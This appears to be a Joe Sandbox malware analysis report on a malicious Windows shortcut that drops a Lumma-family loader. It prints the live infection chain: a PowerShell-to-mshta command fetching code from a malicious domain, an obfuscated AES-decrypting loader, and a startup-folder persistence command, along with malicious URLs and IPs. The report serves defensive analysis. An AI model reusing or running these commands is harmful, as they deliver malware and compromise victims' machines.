Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB8672A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_00007FF7BB8672A8
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB8671F4 FindFirstFileW,FindClose,15_2_00007FF7BB8671F4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB85B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00007FF7BB85B7C0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB822F50 FindFirstFileExW,15_2_00007FF7BB822F50
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB86A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,15_2_00007FF7BB86A4F8
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB866428 FindFirstFileW,FindNextFileW,FindClose,15_2_00007FF7BB866428
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB86A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,15_2_00007FF7BB86A350
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB86A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_00007FF7BB86A874
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB801D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,15_2_00007FF7BB801D80
Source: powershell.exe, 00000014.00000002.2525206353.0000029EF5DB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: wscript.exe, 0000001A.00000002.2558520550.000002942FFC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000014.00000002.2525206353.0000029EF5DB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\gE]
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB870A00 BlockInput,15_2_00007FF7BB870A00
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB7E37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,15_2_00007FF7BB7E37B0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB805BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,15_2_00007FF7BB805BC0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB8532F4 LoadLibraryA,GetProcAddress,15_2_00007FF7BB8532F4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB84D408 LookupPrivilegeValueW,GetProcessHeap,HeapFree,15_2_00007FF7BB84D408
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB8059C8 SetUnhandledExceptionFilter,15_2_00007FF7BB8059C8
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB8057E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF7BB8057E4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB828FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00007FF7BB828FE4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB81AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF7BB81AF58

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB84CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,15_2_00007FF7BB84CE68
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB7E37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,15_2_00007FF7BB7E37B0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB859420 SendInput,keybd_event,15_2_00007FF7BB859420
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB85D1A4 mouse_event,15_2_00007FF7BB85D1A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/baochuan1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '<hex-encoded payload omitted>';function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Users\Public\Guard.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB84C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,15_2_00007FF7BB84C858
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB84D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,15_2_00007FF7BB84D540
Source: powershell.exe, 00000008.00000002.3499608749.000002AB9706F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3499608749.000002AB972FF000.00000004.00000800.00020000.00000000.sdmp, rMpqCJnPv.exe, 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: rMpqCJnPv.exe Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB81FD20 cpuid 15_2_00007FF7BB81FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB85DC1C GetLocalTime,15_2_00007FF7BB85DC1C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB842BCF GetUserNameW,15_2_00007FF7BB842BCF
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB822400 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,15_2_00007FF7BB822400
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB801D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,15_2_00007FF7BB801D80
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000014.00000002.2415190545.0000029E806D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Users\Public\Guard.exe
Source: powershell.exe, 00000014.00000002.2525206353.0000029EF5E11000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rs\Public\Guard.exe
Source: powershell.exe, 00000014.00000002.2415190545.0000029E806D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Public\Guard.exe
Source: powershell.exe, 00000014.00000002.2512877983.0000029EF568A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2525206353.0000029EF5DB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2525206353.0000029EF5E11000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2421163066.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2411826471.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2426640424.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2430267866.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2425627754.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2411652132.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2416313436.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000016.00000003.2426272022.0000000000D50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Guard.exe
Source: rMpqCJnPv.exe, 0000000F.00000002.2357940183.0000021B0E419000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2512877983.0000029EF568A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2525206353.0000029EF5DB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E806D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2512877983.0000029EF56E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000014.00000002.2415190545.0000029E806D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \Users\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob
Source: rMpqCJnPv.exe Binary or memory string: WIN_81
Source: rMpqCJnPv.exe Binary or memory string: WIN_XP
Source: rMpqCJnPv.exe Binary or memory string: WIN_XPe
Source: rMpqCJnPv.exe Binary or memory string: WIN_VISTA
Source: rMpqCJnPv.exe.8.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: rMpqCJnPv.exe Binary or memory string: WIN_7
Source: rMpqCJnPv.exe Binary or memory string: WIN_8
Source: Guard.exe.16.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB873940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,15_2_00007FF7BB873940
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB874074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_00007FF7BB874074
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 21 Windows Management Instrumentation | 1 Scripting | 1 Exploitation for Privilege Escalation | 2 Disable or Modify Tools | 11 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 11 Input Capture | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 3 PowerShell | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 Timestomp | NTDS | 38 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 231 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 13 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
Behavior Graph ID: 1579660, Sample: FzmtNV0vnG.lnk, Startdate: 23/12/2024, Architecture: WINDOWS, Score: 100

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| FzmtNV0vnG.lnk | 26% | Virustotal | | Browse |
| FzmtNV0vnG.lnk | 21% | ReversingLabs | Shortcut.Trojan.Pantera | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\Public\Guard.exe | 8% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\baochuan1[1] | 8% | ReversingLabs | Win32.Dropper.Lumma | |
| C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | 8% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | 30% | ReversingLabs | Win64.Downloader.Generic | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| tiffany-careers.com | 147.45.49.155 | true | false | | high |
| x1.i.lencr.org | unknown | unknown | false | | high |
| nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://tiffany-careers.com/Job_Description.pdf | true | | unknown |
| https://tiffany-careers.com/rMpqCJnPv.exe | true | | unknown |
| https://tiffany-careers.com/baochuan1 | true | | unknown |
| https://tiffany-careers.com/gIpBYOi | true | | unknown |
| https://tiffany-careers.com/ygUmFny.txt | true | | unknown |
                                                                          high
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://tiffany-careers.copowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmptrue
                                                                              unknown
                                                                              https://tiffany-careers.com/rMpqCJnPpowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://aka.ms/pscore68powershell.exe, 00000005.00000002.2089152585.0000021D2628C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2089152585.0000021D26263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB86E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://tiffany-careers.com/rMpowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://tiffany-careers.com/baochuan1Y0powershell.exe, 00000005.00000002.2088198399.0000021D243AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2089152585.0000021D26245000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB86E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://tiffany-careers.compowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80AA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://tiffany-careers.com/rMppowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://tiffany-careers.com/rMpqCJnPv.expowershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
147.45.49.155 | tiffany-careers.com | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
                                                                                              IP
                                                                                              127.0.0.1
                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1579660
                                                                                              Start date and time:2024-12-23 07:10:36 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 8m 27s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:28
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Sample name:FzmtNV0vnG.lnk
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:ac9d5bb32e4d1c1cf52bf17bfdd8cf7b.lnk
                                                                                              Detection:MAL
                                                                                              Classification:mal100.expl.evad.winLNK@43/61@4/2
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 33.3%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 97%
                                                                                              • Number of executed functions: 50
                                                                                              • Number of non-executed functions: 250
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .lnk
                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 23.218.208.137, 172.64.41.3, 162.159.61.3, 52.6.155.20, 52.22.41.97, 3.219.243.226, 3.233.129.217, 23.195.39.65, 23.32.238.88, 2.19.198.73, 23.32.238.161, 2.19.198.48, 23.32.238.99, 23.32.238.106, 2.19.198.42, 23.32.238.89, 2.19.198.66, 23.32.238.131, 23.32.238.96, 2.19.198.75, 23.32.238.155, 23.32.238.147, 23.32.238.137, 23.32.238.113, 23.32.238.145, 23.32.238.105, 23.32.238.154, 23.32.238.122, 23.32.238.136, 23.32.238.160, 13.107.246.63, 4.245.163.56, 23.56.162.204, 52.149.20.212
                                                                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, crl.root-x1.letsencrypt.org.edgekey.net
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 3556 because it is empty
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7728 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:11:28 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
01:11:34 | API Interceptor | 2x Sleep call for process: svchost.exe modified
01:11:35 | API Interceptor | 1x Sleep call for process: mshta.exe modified
01:11:36 | API Interceptor | 135x Sleep call for process: powershell.exe modified
01:11:58 | API Interceptor | 1x Sleep call for process: AcroCEF.exe modified
01:12:41 | API Interceptor | 1332x Sleep call for process: Guard.exe modified
01:12:59 | API Interceptor | 274x Sleep call for process: SwiftWrite.pif modified
07:12:08 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              147.45.49.155R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                              • tiffany-careers.com/PefjSkkhb.exe
                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                              • tiffany-careers.com/BFmcYQ.exe
                                                                                              duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                              • tiffany-careers.com/PefjSkkhb.exe
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              tiffany-careers.comlKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
